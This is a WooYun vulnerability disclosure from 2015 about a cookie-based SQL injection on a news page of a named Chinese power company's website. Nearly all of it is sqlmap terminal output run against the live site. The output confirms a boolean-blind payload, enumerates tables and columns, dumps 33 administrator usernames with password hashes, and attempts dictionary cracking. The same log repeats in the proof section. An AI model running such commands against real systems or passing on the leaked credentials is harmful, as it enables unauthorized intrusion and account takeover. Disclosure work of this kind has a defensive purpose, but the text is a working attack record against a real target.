当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126888

漏洞标题:中国电力投资集团公司存在漏洞

相关厂商:中国电力投资集团公司

漏洞作者: 路人甲

提交时间:2015-07-15 11:54

修复时间:2015-07-20 11:56

公开时间:2015-07-20 11:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-15: 细节已通知厂商并且等待厂商处理中
2015-07-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

http://ysh.cpicorp.com.cn/news.asp?id=2560
cookie注入

root@kali:~# sqlmap -u "http://ysh.cpicorp.com.cn/news.asp" --cookie "id=2560" --level 2
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150708}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 09:53:48
[09:53:48] [INFO] testing connection to the target URL
[09:53:49] [INFO] testing if the target URL is stable. This can take a couple of seconds
[09:53:50] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[09:53:51] [INFO] testing if Cookie parameter 'id' is dynamic
[09:53:52] [INFO] confirming that Cookie parameter 'id' is dynamic
[09:53:52] [INFO] Cookie parameter 'id' is dynamic
[09:53:52] [INFO] heuristic (basic) test shows that Cookie parameter 'id' might be injectable
[09:53:53] [INFO] testing for SQL injection on Cookie parameter 'id'
[09:53:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:53:53] [INFO] heuristics detected web page charset 'GB2312'
[09:53:54] [INFO] Cookie parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[09:53:55] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[09:53:55] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[09:53:55] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[09:53:56] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[09:53:56] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[09:53:56] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[09:53:56] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[09:53:56] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[09:53:56] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[09:53:56] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[09:53:57] [INFO] testing 'MySQL inline queries'
[09:53:57] [INFO] testing 'PostgreSQL inline queries'
[09:53:57] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[09:53:57] [INFO] testing 'Oracle inline queries'
[09:53:57] [INFO] testing 'SQLite inline queries'
[09:53:57] [INFO] testing 'Firebird inline queries'
[09:53:57] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[09:53:58] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[09:53:58] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[09:53:58] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (SELECT)'
[09:53:58] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[09:53:58] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[09:53:58] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[09:53:58] [INFO] testing 'Oracle AND time-based blind'
[09:53:59] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[09:53:59] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:54:02] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
[09:54:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:54:04] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[09:54:07] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns'
[09:54:10] [INFO] checking if the injection point on Cookie parameter 'id' is a false positive
Cookie parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 132 HTTP(s) requests:
---
Parameter: id (Cookie)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2560 AND 2823=2823
---
[09:54:15] [INFO] testing MySQL
[09:54:15] [WARNING] the back-end DBMS is not MySQL
[09:54:15] [INFO] testing Oracle
[09:54:15] [WARNING] the back-end DBMS is not Oracle
[09:54:15] [INFO] testing PostgreSQL
[09:54:15] [WARNING] the back-end DBMS is not PostgreSQL
[09:54:15] [INFO] testing Microsoft SQL Server
[09:54:15] [WARNING] the back-end DBMS is not Microsoft SQL Server
[09:54:15] [INFO] testing SQLite
[09:54:15] [WARNING] the back-end DBMS is not SQLite
[09:54:15] [INFO] testing Microsoft Access
[09:54:16] [INFO] confirming Microsoft Access
[09:54:16] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access
[09:54:16] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 126 times
[09:54:16] [INFO] fetched data logged to text files under '/root/.sqlmap/output/ysh.cpicorp.com.cn'
[*] shutting down at 09:54:16
root@kali:~# sqlmap -u "http://ysh.cpicorp.com.cn/news.asp" --cookie "id=2560" --level 2 --table
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150708}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 09:55:21
[09:55:21] [INFO] resuming back-end DBMS 'microsoft access'
[09:55:21] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (Cookie)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2560 AND 2823=2823
---
[09:55:21] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access
[09:55:21] [INFO] fetching tables for database: 'Microsoft_Access_masterdb'
[09:55:21] [INFO] fetching number of tables for database 'Microsoft_Access_masterdb'
[09:55:21] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:55:21] [INFO] retrieved:
[09:55:22] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast'
[09:55:22] [WARNING] unable to retrieve the number of tables for database 'Microsoft_Access_masterdb'
[09:55:22] [ERROR] cannot retrieve table names, back-end DBMS is Access
do you want to use common table existence check? [Y/n/q]
[09:55:23] [INFO] checking table existence using items from '/usr/share/sqlmap/txt/common-tables.txt'
[09:55:23] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 1
[09:55:24] [WARNING] running in a single-thread mode. This could take a while
[09:55:24] [INFO] retrieved: user
[09:55:32] [INFO] retrieved: admin
[09:55:36] [INFO] retrieved: news
[09:55:41] [INFO] retrieved: book
[09:57:22] [INFO] tried 800/3137 items (26%)
[09:57:22] [INFO] heuristics detected web page charset 'GB2312'
[10:00:12] [INFO] retrieved: mail
[10:00:34] [INFO] retrieved: list
[10:00:47] [INFO] retrieved: keywords

Database: Microsoft_Access_masterdb
[7 tables]
+----------+
| user |
| admin |
| book |
| keywords |
| list |
| mail |
| news |
+----------+
[10:03:22] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3132 times
[10:03:22] [INFO] fetched data logged to text files under '/root/.sqlmap/output/ysh.cpicorp.com.cn'
[*] shutting down at 10:03:22
root@kali:~# sqlmap -u "http://ysh.cpicorp.com.cn/news.asp" --cookie "id=2560" --level 2 --columns -T "admin"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150708}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 10:05:42
[10:05:42] [INFO] resuming back-end DBMS 'microsoft access'
[10:05:42] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (Cookie)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2560 AND 2823=2823
---
[10:05:43] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access
[10:05:43] [ERROR] cannot retrieve column names, back-end DBMS is Access
do you want to use common column existence check? [Y/n/q]
[10:05:58] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast'
[10:05:58] [INFO] checking column existence using items from '/usr/share/sqlmap/txt/common-columns.txt'
[10:05:58] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)]
[10:05:59] [WARNING] running in a single-thread mode. This could take a while
[10:05:59] [INFO] retrieved: id
[10:06:41] [INFO] retrieved: color
[10:07:15] [INFO] retrieved: pwd
[10:07:30] [INFO] retrieved: admin
[10:11:40] [INFO] retrieved: classid
[10:12:08] [INFO] retrieved: admin

[10:12:09] [INFO] heuristics detected web page charset 'GB2312'
Database: Microsoft_Access_masterdb
Table: admin
[5 columns]
+---------+-------------+
| Column | Type |
+---------+-------------+
| admin | non-numeric |
| classid | non-numeric |
| color | non-numeric |
| id | numeric |
| pwd | non-numeric |
+---------+-------------+
[10:12:09] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2494 times
[10:12:09] [INFO] fetched data logged to text files under '/root/.sqlmap/output/ysh.cpicorp.com.cn'
root@kali:~# sqlmap -u "http://ysh.cpicorp.com.cn/news.asp" --cookie "id=2560" --level 2 --dump -C "admin,pwd" -T "admin"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150708}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 10:40:21
[10:40:21] [INFO] resuming back-end DBMS 'microsoft access'
[10:40:21] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (Cookie)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2560 AND 2823=2823
---
[10:40:21] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access
[10:40:21] [ERROR] cannot retrieve column names, back-end DBMS is Access
[10:40:21] [INFO] fetching entries of column(s) 'admin, classid, color, id, pwd' for table 'admin' in database 'Microsoft_Access_masterdb'
[10:40:21] [INFO] fetching number of column(s) 'admin, classid, color, id, pwd' entries for table 'admin' in database 'Microsoft_Access_masterdb'
[10:40:21] [INFO] resumed: 41
[10:40:21] [INFO] fetching number of distinct values for column 'id'
[10:40:21] [INFO] resumed: 41
[10:40:21] [INFO] using column 'id' as a pivot for retrieving row data
[10:40:21] [INFO] resumed: 102
[10:40:21] [INFO] resumed: ea27a7ec65993b13
[10:40:21] [INFO] resumed: admin
[10:40:21] [INFO] resumed:
[10:40:21] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:40:21] [INFO] retrieved:
[10:40:23] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast'
[10:40:23] [INFO] resumed: 167
[10:40:23] [INFO] resumed: 85799099818120cf
[10:40:23] [INFO] resumed: hdfgs
[10:40:23] [INFO] resumed:
[10:40:23] [INFO] retrieved:
[10:40:24] [INFO] resumed: 168
[10:40:24] [INFO] resumed: 122f44b0c8fb786a
[10:40:24] [INFO] resumed: hbfgs
[10:40:24] [INFO] resumed:
[10:40:24] [INFO] retrieved:
[10:40:25] [INFO] resumed: 169
[10:40:25] [INFO] resumed: 5041b101874aea02
[10:40:25] [INFO] resumed: xbfgs
[10:40:25] [INFO] resumed:
[10:40:25] [INFO] retrieved: ^[^A
[10:40:26] [INFO] resumed: 171
[10:40:26] [INFO] resumed: 52ed4d764d26ff34
[10:40:26] [INFO] resumed: jxgs
[10:40:26] [INFO] resumed:
[10:40:26] [INFO] retrieved:
[10:40:27] [INFO] resumed: 172
[10:40:27] [INFO] resumed: 67fe03dcdbad00d6
[10:40:27] [INFO] resumed: hngs
[10:40:27] [INFO] resumed:
[10:40:27] [INFO] retrieved:
[10:40:28] [INFO] resumed: 173
[10:40:28] [INFO] resumed: 465ccaa8b72fe776
[10:40:28] [INFO] resumed: hnfgs
[10:40:28] [INFO] resumed:
[10:40:28] [INFO] retrieved:
[10:40:29] [INFO] resumed: 174
[10:40:29] [INFO] resumed: 35555f36a72585a7
[10:40:29] [INFO] resumed: dbgs
[10:40:29] [INFO] resumed:
[10:40:29] [INFO] retrieved:
[10:40:30] [INFO] resumed: 175
[10:40:30] [INFO] resumed: a2aeabfbdd45c506
[10:40:30] [INFO] resumed: zdgj
[10:40:30] [INFO] resumed:
[10:40:30] [INFO] retrieved:
[10:40:31] [INFO] resumed: 176
[10:40:31] [INFO] resumed: c0f1b6a831c399e2
[10:40:31] [INFO] resumed: 123
[10:40:31] [INFO] resumed:
[10:40:31] [INFO] retrieved:
[10:40:32] [INFO] resumed: 177
[10:40:32] [INFO] resumed: 6f7c64d5d6a44bd1
[10:40:32] [INFO] resumed: ctgs
[10:40:32] [INFO] resumed:
[10:40:32] [INFO] retrieved:
[10:40:33] [INFO] resumed: 178
[10:40:33] [INFO] resumed: 809d068fffa76d26
[10:40:33] [INFO] resumed: cwgs
[10:40:33] [INFO] resumed:
[10:40:33] [INFO] retrieved:
[10:40:34] [INFO] resumed: 180
[10:40:34] [INFO] resumed: 1c983756ea9b2b7b
[10:40:34] [INFO] resumed: yngj
[10:40:34] [INFO] resumed:
[10:40:34] [INFO] retrieved:
[10:40:35] [INFO] resumed: 181
[10:40:35] [INFO] resumed: 23046518a13e12be
[10:40:35] [INFO] resumed: jxhd
[10:40:35] [INFO] resumed:
[10:40:35] [INFO] retrieved:
[10:40:36] [INFO] resumed: 182
[10:40:36] [INFO] resumed: 6f48df442c5cbdc5
[10:40:36] [INFO] resumed: mdny
[10:40:36] [INFO] resumed:
[10:40:36] [INFO] retrieved:
[10:40:37] [INFO] resumed: 183
[10:40:37] [INFO] resumed: 37f09672358ec7aa
[10:40:37] [INFO] resumed: cqfgs
[10:40:37] [INFO] resumed:
[10:40:37] [INFO] retrieved:
[10:40:38] [INFO] resumed: 184
[10:40:38] [INFO] resumed: b942de0ba40a163c
[10:40:38] [INFO] resumed: jdgf
[10:40:38] [INFO] resumed:
[10:40:38] [INFO] retrieved:
[10:40:39] [INFO] resumed: 185
[10:40:39] [INFO] resumed: 83aa400af464c76d
[10:40:39] [INFO] resumed: sdhd
[10:40:39] [INFO] resumed:
[10:40:39] [INFO] retrieved:
[10:40:40] [INFO] resumed: 186
[10:40:40] [INFO] resumed: c1f26a327d523b0a
[10:40:40] [INFO] resumed: jlhd
[10:40:40] [INFO] resumed:
[10:40:40] [INFO] retrieved:
[10:40:41] [INFO] resumed: 187
[10:40:41] [INFO] resumed: 8e3a708beb5c391f
[10:40:41] [INFO] resumed: nxnyly
[10:40:41] [INFO] resumed:
[10:40:41] [INFO] retrieved:
[10:40:42] [INFO] resumed: 188
[10:40:42] [INFO] resumed: 9100d6a089358eff
[10:40:42] [INFO] resumed: jyjt
[10:40:42] [INFO] resumed:
[10:40:42] [INFO] retrieved:
[10:40:43] [INFO] resumed: 189
[10:40:43] [INFO] resumed: a82bb52718c90176
[10:40:43] [INFO] resumed: gzx
[10:40:43] [INFO] resumed:
[10:40:44] [INFO] retrieved:
[10:40:45] [INFO] resumed: 190
[10:40:45] [INFO] resumed: 1360d417348186f4
[10:40:45] [INFO] resumed: wldl
[10:40:45] [INFO] resumed:
[10:40:45] [INFO] retrieved:
[10:40:46] [INFO] resumed: 192
[10:40:46] [INFO] resumed: cafd1495e6c51c0d
[10:40:46] [INFO] resumed: gcgs
[10:40:46] [INFO] resumed:
[10:40:46] [INFO] retrieved:
[10:40:47] [INFO] resumed: 193
[10:40:47] [INFO] resumed: da7f2b5c70773261
[10:40:47] [INFO] resumed: nfgs
[10:40:47] [INFO] resumed:
[10:40:47] [INFO] retrieved:
[10:40:48] [INFO] resumed: 194
[10:40:48] [INFO] resumed: 7f36a6d0e9ba5c11
[10:40:48] [INFO] resumed: nfgs
[10:40:48] [INFO] resumed:
[10:40:48] [INFO] retrieved:
[10:40:49] [INFO] resumed: 195
[10:40:49] [INFO] resumed: 49ba59abbe56e057
[10:40:49] [INFO] resumed: xjfgs
[10:40:49] [INFO] resumed:
[10:40:49] [INFO] retrieved:
[10:40:50] [INFO] resumed: 196
[10:40:50] [INFO] resumed: 90b13d6d29d89958
[10:40:50] [INFO] resumed: xzfgs
[10:40:50] [INFO] resumed:
[10:40:50] [INFO] retrieved:
[10:40:51] [INFO] resumed: 197
[10:40:51] [INFO] resumed: d1afe05843b6811c
[10:40:51] [INFO] resumed: hbgs
[10:40:51] [INFO] resumed:
[10:40:51] [INFO] retrieved:
[10:40:52] [INFO] resumed: 198
[10:40:52] [INFO] resumed: 819c8d17b52da589
[10:40:52] [INFO] resumed: jsgs
[10:40:52] [INFO] resumed:
[10:40:52] [INFO] retrieved:
[10:40:53] [INFO] resumed: 199
[10:40:53] [INFO] resumed: 7dc7da0ccb393d01
[10:40:53] [INFO] resumed: scgs
[10:40:53] [INFO] resumed:
[10:40:53] [INFO] retrieved:
[10:40:54] [INFO] resumed: 200
[10:40:54] [INFO] resumed: caa2c3e89d175cb5
[10:40:54] [INFO] resumed: zdh
[10:40:54] [INFO] resumed:
[10:40:54] [INFO] retrieved:
[10:40:55] [INFO] resumed: 201
[10:40:55] [INFO] resumed: 6ef195a0f7622a9c
[10:40:55] [INFO] retrieved:
[10:40:56] [INFO] heuristics detected web page charset 'GB2312'
gjky
[10:41:03] [INFO] retrieved:
[10:41:05] [INFO] retrieved:
[10:41:06] [INFO] retrieved: 202
[10:41:12] [INFO] retrieved: 21^C
[10:41:17] [WARNING] user aborted during enumeration. sqlmap will display partial output
[10:41:17] [INFO] analyzing table dump for possible password hashes
[10:41:17] [INFO] recognized possible password hashes in column 'pwd'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to crack them via a dictionary-based attack? [Y/n/q]
[10:41:19] [INFO] using hash method 'mysql_old_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[10:41:20] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[10:41:20] [INFO] starting dictionary-based cracking (mysql_old_passwd)
[10:41:20] [WARNING] multiprocessing hash cracking is currently not supported on this platform
[10:41:57] [WARNING] no clear password(s) found
[10:41:57] [INFO] postprocessing table dump
Database: Microsoft_Access_masterdb
Table: admin
[33 entries]
+-----+---------+--------+-------+------------------+
| id | classid | admin | color | pwd |
+-----+---------+--------+-------+------------------+
| 102 | <blank> | admin | NULL | ea27a7ec65993b13 |
| 167 | <blank> | hdfgs | NULL | 85799099818120cf |
| 168 | <blank> | hbfgs | NULL | 122f44b0c8fb786a |
| 169 | <blank> | xbfgs | NULL | 5041b101874aea02 |
| 171 | <blank> | jxgs | NULL | 52ed4d764d26ff34 |
| 172 | <blank> | hngs | NULL | 67fe03dcdbad00d6 |
| 173 | <blank> | hnfgs | NULL | 465ccaa8b72fe776 |
| 174 | <blank> | dbgs | NULL | 35555f36a72585a7 |
| 175 | <blank> | zdgj | NULL | a2aeabfbdd45c506 |
| 176 | <blank> | 123 | NULL | c0f1b6a831c399e2 |
| 177 | <blank> | ctgs | NULL | 6f7c64d5d6a44bd1 |
| 178 | <blank> | cwgs | NULL | 809d068fffa76d26 |
| 180 | <blank> | yngj | NULL | 1c983756ea9b2b7b |
| 181 | <blank> | jxhd | NULL | 23046518a13e12be |
| 182 | <blank> | mdny | NULL | 6f48df442c5cbdc5 |
| 183 | <blank> | cqfgs | NULL | 37f09672358ec7aa |
| 184 | <blank> | jdgf | NULL | b942de0ba40a163c |
| 185 | <blank> | sdhd | NULL | 83aa400af464c76d |
| 186 | <blank> | jlhd | NULL | c1f26a327d523b0a |
| 187 | <blank> | nxnyly | NULL | 8e3a708beb5c391f |
| 188 | <blank> | jyjt | NULL | 9100d6a089358eff |
| 189 | <blank> | gzx | NULL | a82bb52718c90176 |
| 190 | <blank> | wldl | NULL | 1360d417348186f4 |
| 192 | <blank> | gcgs | NULL | cafd1495e6c51c0d |
| 193 | <blank> | nfgs | NULL | da7f2b5c70773261 |
| 194 | <blank> | nfgs | NULL | 7f36a6d0e9ba5c11 |
| 195 | <blank> | xjfgs | NULL | 49ba59abbe56e057 |
| 196 | <blank> | xzfgs | NULL | 90b13d6d29d89958 |
| 197 | <blank> | hbgs | NULL | d1afe05843b6811c |
| 198 | <blank> | jsgs | NULL | 819c8d17b52da589 |
| 199 | <blank> | scgs | NULL | 7dc7da0ccb393d01 |
| 200 | <blank> | zdh | NULL | caa2c3e89d175cb5 |
| 201 | <blank> | gjky | NULL | 6ef195a0f7622a9c |
+-----+---------+--------+-------+------------------+
[10:41:57] [INFO] table 'Microsoft_Access_masterdb.admin' dumped to CSV file '/root/.sqlmap/output/ysh.cpicorp.com.cn/dump/Microsoft_Access_masterdb/admin.csv'
[10:41:57] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 252 times
[10:41:57] [INFO] fetched data logged to text files under '/root/.sqlmap/output/ysh.cpicorp.com.cn'
[*] shutting down at 10:41:57


太慢了,就让我暂停了
点到为止

漏洞证明:

http://ysh.cpicorp.com.cn/news.asp?id=2560
cookie注入

root@kali:~# sqlmap -u "http://ysh.cpicorp.com.cn/news.asp" --cookie "id=2560" --level 2
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150708}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 09:53:48
[09:53:48] [INFO] testing connection to the target URL
[09:53:49] [INFO] testing if the target URL is stable. This can take a couple of seconds
[09:53:50] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[09:53:51] [INFO] testing if Cookie parameter 'id' is dynamic
[09:53:52] [INFO] confirming that Cookie parameter 'id' is dynamic
[09:53:52] [INFO] Cookie parameter 'id' is dynamic
[09:53:52] [INFO] heuristic (basic) test shows that Cookie parameter 'id' might be injectable
[09:53:53] [INFO] testing for SQL injection on Cookie parameter 'id'
[09:53:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:53:53] [INFO] heuristics detected web page charset 'GB2312'
[09:53:54] [INFO] Cookie parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[09:53:55] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[09:53:55] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[09:53:55] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[09:53:56] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[09:53:56] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[09:53:56] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[09:53:56] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[09:53:56] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[09:53:56] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[09:53:56] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[09:53:57] [INFO] testing 'MySQL inline queries'
[09:53:57] [INFO] testing 'PostgreSQL inline queries'
[09:53:57] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[09:53:57] [INFO] testing 'Oracle inline queries'
[09:53:57] [INFO] testing 'SQLite inline queries'
[09:53:57] [INFO] testing 'Firebird inline queries'
[09:53:57] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[09:53:58] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[09:53:58] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[09:53:58] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (SELECT)'
[09:53:58] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[09:53:58] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[09:53:58] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[09:53:58] [INFO] testing 'Oracle AND time-based blind'
[09:53:59] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[09:53:59] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:54:02] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
[09:54:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:54:04] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[09:54:07] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns'
[09:54:10] [INFO] checking if the injection point on Cookie parameter 'id' is a false positive
Cookie parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 132 HTTP(s) requests:
---
Parameter: id (Cookie)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2560 AND 2823=2823
---
[09:54:15] [INFO] testing MySQL
[09:54:15] [WARNING] the back-end DBMS is not MySQL
[09:54:15] [INFO] testing Oracle
[09:54:15] [WARNING] the back-end DBMS is not Oracle
[09:54:15] [INFO] testing PostgreSQL
[09:54:15] [WARNING] the back-end DBMS is not PostgreSQL
[09:54:15] [INFO] testing Microsoft SQL Server
[09:54:15] [WARNING] the back-end DBMS is not Microsoft SQL Server
[09:54:15] [INFO] testing SQLite
[09:54:15] [WARNING] the back-end DBMS is not SQLite
[09:54:15] [INFO] testing Microsoft Access
[09:54:16] [INFO] confirming Microsoft Access
[09:54:16] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access
[09:54:16] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 126 times
[09:54:16] [INFO] fetched data logged to text files under '/root/.sqlmap/output/ysh.cpicorp.com.cn'
[*] shutting down at 09:54:16
root@kali:~# sqlmap -u "http://ysh.cpicorp.com.cn/news.asp" --cookie "id=2560" --level 2 --table
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150708}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 09:55:21
[09:55:21] [INFO] resuming back-end DBMS 'microsoft access'
[09:55:21] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (Cookie)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2560 AND 2823=2823
---
[09:55:21] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access
[09:55:21] [INFO] fetching tables for database: 'Microsoft_Access_masterdb'
[09:55:21] [INFO] fetching number of tables for database 'Microsoft_Access_masterdb'
[09:55:21] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:55:21] [INFO] retrieved:
[09:55:22] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast'
[09:55:22] [WARNING] unable to retrieve the number of tables for database 'Microsoft_Access_masterdb'
[09:55:22] [ERROR] cannot retrieve table names, back-end DBMS is Access
do you want to use common table existence check? [Y/n/q]
[09:55:23] [INFO] checking table existence using items from '/usr/share/sqlmap/txt/common-tables.txt'
[09:55:23] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 1
[09:55:24] [WARNING] running in a single-thread mode. This could take a while
[09:55:24] [INFO] retrieved: user
[09:55:32] [INFO] retrieved: admin
[09:55:36] [INFO] retrieved: news
